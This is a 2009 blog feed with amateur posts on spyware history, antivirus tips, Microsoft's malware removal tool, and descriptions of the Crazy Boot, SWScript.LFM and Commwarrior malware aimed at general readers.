type='html'>Now let us look in to a small history of the Spyware. I have searched several sites for getting the history of Spyware. The Wikipedia provides good and clear information on the history of the Spyware. I have extracted some part of the history of the Spyware here just for you. The first known use of the word Spyware was in October 16, 1995 and it was against Microsoft Business Model. Spyware was first considered as a hardware meant for the espionage purposes. In the early 2000, the founder of the Zone labs, Gregor Freund, used the term spyware during the release of the ZoneAlarm Firewall. Since then the term is used in its present sense. As of 2006, spyware has become one of the prominent security threats to computers using Microsoft Windows operating systems. Computers using Internet Explorer (IE) is the primary browser are particularly vulnerable to such attacks. It not only because IE is the most widely-used browser, but because its tight integration with Windows allows spyware access to crucial parts of the operating system.&lt;br /&gt;Before Internet Explorer 7 was released, the browser would display a message showing that activex must be installed to view a particular section of the website or the whole website. But in most cases the spyware will be in disguised as activex. The combination of user naiveté towards malware and the assumption by Internet Explorer that all ActiveX components are benign, led, in part, to the massive spread of spyware. Many spyware components would also make use of exploits in Javascript, Internet Explorer and Windows to install without user knowledge or permission. After installtion, sometimes windows pop-up warning messages about the presence of the Spyware in the Computer.&lt;br /&gt;&lt;br /&gt;The Windows Registry contains multiple sections that by modifying keys values allows software to be executed automatically when the operating system boots. Spyware can exploit this design to circumvent attempts at removal. The spyware typically will link itself from each location in the registry that allows execution. Once running, the spyware will periodically check if any of these links are removed. If so, they will be automatically restored. This ensures that the spyware will execute when the operating system is booted even if some (or most) of the registry links are removed.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;           &lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" alt="" border="0"&gt;&lt;/a&gt;                      &lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png"&gt;&lt;/a&gt;                               &lt;a onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()"&gt;&lt;img alt="Bookmark and Share" style="border: 0pt none ;" src="http://s7.addthis.com/static/btn/lg-share-en.gif" border="0" height="16" width="125"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;script type="text/javascript"&gt;var addthis_pub="prabinceal";&lt;/script&gt;&lt;br /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-8617281810995258723?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/8617281810995258723/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/spyware-part-2.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8617281810995258723'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8617281810995258723'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/spyware-part-2.html' title='Spyware (Part - 2)'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-4738413699288083631</id><published>2009-07-20T10:32:00.000-07:00</published><updated>2009-07-20T10:35:26.060-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='computer virus'/><category scheme='http://www.blogger.com/atom/ns#' term='Anti-Virus'/><category scheme='http://www.blogger.com/atom/ns#' term='computer security'/><title type='text'>How to keep your PC virus free</title><content type='html'>You may be wondered that is there any way to keep the PC from the virus infection. Here are some tips to keep the PC from the viruses:&lt;br /&gt;For keeping the PC from the computer viruses and other malicious applications we need mainly three softwares:&lt;br /&gt;&lt;br /&gt;1. Anti-virus&lt;br /&gt;2. Anti Malware Software&lt;br /&gt;3. Rootkit Remover&lt;br /&gt;&lt;br /&gt;Now let us see why we have to use these software. Let us took the case of the anti-virus . As you know anti-virus is used to find and destroy the virus. Knowing this most computer users install anti-virus. But many of the people using the anti-virus are not updating the anti-virus properly. This may put your PC in trouble. The anti-virus has generally two parts: 1. virus signature database and 2. anti-virus engine. Each virus has its own signature as a person has his own signature. The virus signature is nothing but a series of codes that is placed in every file it infect. This code is unique for that particular virus. So by simply comparing the virus signature with the data of a file it is easier to detect the presence of the virus. Since more and more viruses are released in to the cyber space daily, the anti-virus firms discovers the virus signatures of the new virus and put the virus signatures in the internet for the user to download. When we update the anti-virus, these signatures are downloaded in to the database of the anti-virus, and anti-virus gains the capability to detect the new viruses. The anti-virus engine compares the virus signature in the virus signature database with the data of the files. If a match is found, the file will be treated as an infected file and took the measures to prevent further infection and deletion of the virus and the recovery of the original file. It also scans memory for the presence of the virus.&lt;br /&gt;&lt;br /&gt;The usage of the anti-virus will not guarantee the protection of the PC from all the malicious software. For that purpose we have to use the anti-malware software. Malware Bytes is one of the most common anti-malware software  used internationally. The anti-malware software scan the memory as well as the storage device of the PC for the malicious software. This software can effectively remove almost all the malicious softwares in the PC. But there are some malware application that survive this anti malware software. We can use the rootkit remover software for removing that type of applications. Rootkits are capable of killing and hiding different processes running in the Operating System. Some softwares like demon tools use rootkits, but are not malicious software. Rootkit revealer is a rootkit remover tool used today.&lt;br /&gt;These softwares are not enough to keep your PC from all attacks, if you have an internet connection. You must use a firewall to regulate the internet usage by the applications and to prevent the unwanted packets from entering in to the PC. I prefer Sygate Firewall than the windows firewall since it allows to block the unwanted applications from accessing the internet. But do not use more than one firewall for a PC since the firewalls works on its own set of rules and may clash if more than one firewall is used.&lt;br /&gt;Always use the firefox 3.5 browser for more security. The add-ons must be downloaded if it is marked as recommended. Do not install add-on from the third party whom you do not trust.&lt;br /&gt;&lt;br /&gt;Always download the softwares from the trusted sites like filehippo,cnet,brothersoft etc. Try to avoid downloading the softwares from the unfamiliar sites. I believe that these tips will help you to keep your PC clean.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;             &lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" alt="" border="0" /&gt;&lt;/a&gt;              &lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;                   &lt;a onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()"&gt;&lt;img alt="Bookmark and Share" style="border: 0pt none ;" src="http://s7.addthis.com/static/btn/lg-share-en.gif" border="0" height="16" width="125" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;script type="text/javascript"&gt;var addthis_pub="prabinceal";&lt;/script&gt;&lt;br /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-4738413699288083631?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/4738413699288083631/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/how-to-keep-your-pc-virus-free.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4738413699288083631'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4738413699288083631'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/07/how-to-keep-your-pc-virus-free.html' title='How to keep your PC virus free'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-349766166573996775</id><published>2009-06-26T19:59:00.000-07:00</published><updated>2009-06-26T20:34:18.133-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='spyware'/><category scheme='http://www.blogger.com/atom/ns#' term='Cyber Spying'/><title type='text'>Spyware (Part - 1)</title><content type='html'>A Spyware is any technology or software that gathers personal information of a person or the confidential information of a organization. A Spyware is a malicious application that is installed in the computer with or without the knowledge of the user. The Spyware, as its name suggest perform the function of a spy. It collects several information from the computer and send the information to the attacker. Some spywares allows the user to configure the victim's computer to his needs.  The spyeare may be installed in to the computer without the knowledge of the user through the drive by download or by clicking the link on the pop-up window. But there are spywares available in the market which help the parents to track the sites visited by their children. As you may know that the browser stores the information about the sites you visited in the cookies. If the personal information about you are stored in the cookie, then cookie can be considered as a spyware. In the beginning stage the function of the spyware is just monitering the user. But as the time passes, more powerful spyware were introduced. There functions are not just limited to the simple monitering the user. It can not only collect the browsing habts of the user but can also install the software that will interfere with the normal operation of the computer. You may someetimes noticed that you cannot access the internet, but the data transfer occurs between your computer and the internet without your permission. That may be because of the spyware. Some people asks through the sites like yahoo answers, ibibo.com etc about the problem of the spyware redirecting the website. Even if they entered the correct website address, they are redirected to another site. This shows that your browser has compremissed with the spyware installed. As you may know, any personal information that is collected without the knowledge of the user by any means is a crime. Similarly the creaton and uasge of spyware that collects the personal information about the other people or organization is a crime. Many countries have made strict laws to prevent the spyware. Yet there are people creating the spyware, challenging the laws of their own nation.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;   &lt;img src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" alt="" border="0" /&gt;&lt;/a&gt;                   &lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;                   &lt;a onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()"&gt;&lt;img alt="Bookmark and Share" style="border: 0pt none ;" src="http://s7.addthis.com/static/btn/lg-share-en.gif" border="0" height="16" width="125" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;script type="text/javascript"&gt;var addthis_pub="prabinceal";&lt;/script&gt;&lt;br /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-349766166573996775?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/349766166573996775/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/spyware-part-1.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/349766166573996775'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/349766166573996775'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/spyware-part-1.html' title='Spyware (Part - 1)'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-8711379552231510345</id><published>2009-06-24T20:25:00.000-07:00</published><updated>2009-06-24T21:29:11.837-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='removal'/><title type='text'>Microsoft Malicious Tool For Computer Virus Removal</title><content type='html'>&lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt; &lt;/a&gt;You may know that Microsoft releases the patches for the new computer viruses and the bugs they found. They also releases some viral removal tools such as Rootkit Revealer for the Windows users. The arrival of these tools as well as the applications for keeping the computer away from the attack of the malicious programs proves their concern about the security of the computers running on Windows. Microsoft is spending   splendid resources including time for the Windows Users. They want Windows to be the secure Operating System. You may be noticed that the new Operating Systems that the Microsoft releases are having far good security than its older versions. Some releases even threatened the anti virus software firms. But the virus makers found the loop holes in the security measures and creats the virus that exploits the loop hole to its maximum extend.&lt;br /&gt;There are several softwares available in the Microsoft's website for the computer security. Millions of people have downloaded and installed these softwares. The people who do not download these software may due to the lack of internet connection or due to unawareness or they are using the pirated version of the Windows fearing that they would be caught if they connect to the Microsoft's website. Dont worry about that, you can download it from other trusted websites like Brothersoft, CNET, filehippo etc.&lt;br /&gt;Microsoft has released a malacious removal tool which is a freeware and can be downloaded from the internet. The tool is ment for Windows Vista, XP, 2000, 2003 Windows Server. This Malacious Software Removal Tool can remove any malacious software that is running behind the process tree. For running the application you have to download the application. Then install it in your computer. You can install the application only if you are accessing the computer with your administrator account. After installing the application you can run the software and perform the scan. It will remove all the malacious software running in th process tree. You can use it along with the other anti virus softwares.&lt;br /&gt;The application to be download is 8.4 MB in size. The file name is "windows-kb890830-v2.11.exe". You can download it from:&lt;br /&gt;&lt;div style="text-align: center;"&gt; &lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=ad724ae0-e72d-4f54-9ab3-75b8eb148356&amp;amp;displaylang=en"&gt;http://www.microsoft.com/downloads/details.aspx?FamilyID=ad724ae0-e72d-4f54-9ab3-75b8eb148356&amp;amp;displaylang=en&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" alt="" border="0" /&gt;&lt;/a&gt;               &lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;                   &lt;a onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()"&gt;&lt;img alt="Bookmark and Share" style="border: 0pt none ;" src="http://s7.addthis.com/static/btn/lg-share-en.gif" border="0" height="16" width="125" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;script type="text/javascript"&gt;var addthis_pub="prabinceal";&lt;/script&gt;&lt;br /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-8711379552231510345?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/8711379552231510345/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/microsoft-malicious-tool-for-computer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8711379552231510345'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8711379552231510345'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/microsoft-malicious-tool-for-computer.html' title='Microsoft Malicious Tool For Computer Virus Removal'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-4601574260100131336</id><published>2009-06-24T02:19:00.000-07:00</published><updated>2009-06-24T02:55:51.395-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Crazy Boot'/><category scheme='http://www.blogger.com/atom/ns#' term='bootstrap virus'/><category scheme='http://www.blogger.com/atom/ns#' term='Booting from infected disk'/><title type='text'>Crazy Boot Computer virus</title><content type='html'>Crazy Boot is a computer virus that is capable of infecting the computers running on Windows. It spreads through the floppy disks. When a host computer is booted from a floppy disk infected by the Crazy Boot virus, the virus starts infecting the host computer. However it does not cause any physical damage or direct loss of information. It is a boot virus. It infects a computer only when the computer is booted from an infected disk. When a computer is booted from an infected floppy, then Crazy Boot infects the Master Boot Record. It reads the highest memory location from the RAM and reside in the highest memory location. Once it gets in to the memory, it starts infecting files that are not write protected.&lt;br /&gt;Crazy Boot virus is a stealth virus. If you try to examine the infected boot sector, it displays the correct boot sector information. It also displays the message:&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: center;"&gt;DON'T PLAY WITH THE PC!&lt;br /&gt;OTHERWISE YOU WILL GET IN 'DEEP, DEEP' TROUBLE!. . .&lt;br /&gt;CRAZY BOOT VER. 1.0&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;There is a very low chance for a computer get infected bu the Crazy Boot virus today since the era of floppy disk is almost over and due to the security measures included in the Windows available today in the market. It is very risky to disinfect the boot sector using the FDISK/MBR. It is because Crazy Boot virus will not place the MBR in its correct location. But the location is known to Crazy Boot virus. It is better to use a proper antivirus to remove the virus.&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" alt="" border="0" /&gt;&lt;/a&gt;     &lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;       &lt;a onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()"&gt;&lt;img alt="Bookmark and Share" style="border: 0pt none ;" src="http://s7.addthis.com/static/btn/lg-share-en.gif" border="0" height="16" width="125" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;script type="text/javascript"&gt;var addthis_pub="prabinceal";&lt;/script&gt;&lt;br /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-4601574260100131336?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/4601574260100131336/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/crazy-boot-computer-virus.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4601574260100131336'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4601574260100131336'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/crazy-boot-computer-virus.html' title='Crazy Boot Computer virus'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-2336533275683988698</id><published>2009-06-23T00:23:00.001-07:00</published><updated>2009-06-23T00:23:49.990-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='swf'/><category scheme='http://www.blogger.com/atom/ns#' term='macromediaflash'/><category scheme='http://www.blogger.com/atom/ns#' term='SWScript.LFM'/><title type='text'>The Latest Computer-Virus Victim - Macromedia Shockwave</title><content type='html'>You may be familiar with the .swf files. They are created using the Macromedia Flash. They are used to create animations. I have also created some small flash movies. The swf file contains some audio and video data that deals with the animation. The file is very compact that they can be used in many web based applications. Several websites including those owned by the multinational companies uses flash animations to make their website more attractive and user interactive. One of the example is the esnips.com. the site uses the flash file to allow the user to upload the files. You can also see an attractive animation that involves good user interaction in the website of the company Hero Honda. More over flash allows one to create small applications. The flash gives a lot of functions for the user to create the applications very easily and can accomodate complex functions. The applications created using the flash is more attractive than created using java or cpp. The usage of the flash in the website is considered more secure than including video. But the recent reports by the Kaspersky anti virus firm proves it to be wrong. &lt;span style="font-weight: bold;"&gt;SWScript.LFM&lt;/span&gt;, which is the first malicious program that infects the popular multimedia format, Macromedia Shockwave.For spreading, this malicious program requires several important conditions, whose simultaneous execution is highly unlikely. First of all, LFM requires a PC that has been installed with a full program version that executes Macromedia Shockwave files - special plug-in versions installed on Internet Explorer and Netscape Navigator by default are not enough for the virus to operate. Secondly, a user has to manually download the infected SMF file to his computer and start it up. Thirdly, fortunately LFM is only capable of infecting SMF files located in the same directory as the file-carrying virus. Kaspersky Labs considers the possibility of an epidemic outbreak caused by the LFM virus to be very unlikely. May be this starts the new era in the computer virus which can spread more than other virus since many websites uses flash based applications.&lt;br /&gt;Defense procedures against LFM have already been added to the Kaspersky Labs daily anti-virus database update as of January 8, 2002. &lt;span style="font-style: italic;"&gt;You will get a more detailed information about this malicious program is available in the Kaspersky Virus Encyclopedia.&lt;/span&gt;&lt;br /&gt;  &lt;div class="flockcredit" style="text-align: right; color: #CCC; font-size: x-small;"&gt;Blogged with the &lt;a href="http://www.flock.com/blogged-with-flock" style="color: #999; font-weight: bold;" target="_new" title="Flock Browser"&gt;Flock Browser&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-2336533275683988698?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/2336533275683988698/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/latest-computer-virus-victim-macromedia.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2336533275683988698'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2336533275683988698'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/latest-computer-virus-victim-macromedia.html' title='The Latest Computer-Virus Victim - Macromedia Shockwave'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-4178331894026692970</id><published>2009-06-21T20:48:00.001-07:00</published><updated>2009-06-21T20:48:06.924-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='removal'/><category scheme='http://www.blogger.com/atom/ns#' term='mobile virus'/><category scheme='http://www.blogger.com/atom/ns#' term='commwarrior'/><title type='text'>Commwarrior Mobile Virus</title><content type='html'>Commwarrior is a mobile worm developed to infect the mobiles running on the Symbian OS. It was first discovered in Russia. It uses Bluetooth and MMS as the medium for spreading. Commwarrior.A checks the system cloack and decides which application can be used for the spreading. But Commwarrior does not use this method. The worm reads the mobile numbers from the address book of the infected mobile and sends out the virus files via Bluetooth and through MMS. Normally if a virus starts spreading, the users can be warned against the virus if the name if the infected file that the virus will sent to the other mobiles. The Commwarrior cannot be prevented by this manner. It can name the infected files with different names as the parent names his child. Since the different infected files have different names, the users cannot be warned aginst receiving the infected file. Usually the multimedia files are send through the MMS. So the users have the feeling that the files received through the MMS are more secure since the images and video have a minor probability to be a virus. But unfortunately the Symbian installation files can be sent through the MMS. This feature (may be loop hole) is used by the worm for infecting the other mobiles. So be carefull about the files you received in the mobiles. Always check whether the file is sent with the knowledge of the person from whose mobile you received the file.&lt;br /&gt;&lt;br /&gt;&lt;font style="text-decoration: underline;" size="4"&gt;Spreading through Bluetooth&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Commwarrior spreads through bluetooth using the SIS files that have different names. The SIS file contains the worm main executable commwarrior.exe and boot component commrec.mdl. The SIS file contains autostart settings that will automatically execute commwarrior.exe after the SIS file is being installed. &lt;br /&gt;When Commwarrior worm is executed it will start looking for other bluetooth enabled devices. If a device is found, it send a copy of itself to each of these phones one after another. If target phone goes out of range or rejects file transfer, the Commwarrior will search for another phone. The Commwarrior worm will look for new targets after sending itself to the first target, thus it is able to contact all phones in range.&lt;br /&gt;Replication over MMS&lt;br /&gt;&lt;br /&gt;&lt;font style="text-decoration: underline;" size="4"&gt;Spreading though MMS:&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Commwarrior spreads through the MMS by sending MMS messages that contains the infected SIS file to other users whose mobile numbers were in the address book of the infected mobile. The MMS messages contain variable text messages and Commwarrior SIS file with filename commw.sis. Unlike in bluetooth spreading, the SIS file name is constant, otherwise the SIS file is identical to the one sent in bluetooth spreading.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr style="width: 100%; height: 2px;" /&gt;&lt;br /&gt;&lt;font style="text-decoration: underline;" size="4"&gt;Disinfection:&lt;/font&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; The easiest way for disinfection is the use of the anti virus software for the mobile phone and it will remove almost all the viruses in your mobile phones. Several companies like F-Secure are providing softwares for the removal of the mobile phone viruses. For downloading the software, open the browser in your mobile and navigate to : &lt;a href="http://mobile.f-secure.com/"&gt;http://mobile.f-secure.com&lt;/a&gt;. Click on the link "Download F-Secure Mobile Anti-Virus" and then select your phone model. Then download the file and then install it. After installing go to the menu and open the antivirus and scan the mobile phone for virus. The software will detect the viruses and removes it. But to kill the running Commwarrior process, the mobile phone must be restarted. You will get a detailed description about the manual removal from: &lt;br /&gt;http://www.cell-phone-viruses.com/1124211683-commwarrior-virus-manual-removal.html  &lt;div class="flockcredit" style="text-align: right; color: #CCC; font-size: x-small;"&gt;Blogged with the &lt;a href="http://www.flock.com/blogged-with-flock" style="color: #999; font-weight: bold;" target="_new" title="Flock Browser"&gt;Flock Browser&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-4178331894026692970?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/4178331894026692970/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/commwarrior-mobile-virus.html#comment-form' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4178331894026692970'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4178331894026692970'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/commwarrior-mobile-virus.html' title='Commwarrior Mobile Virus'/><author><name>Prabin 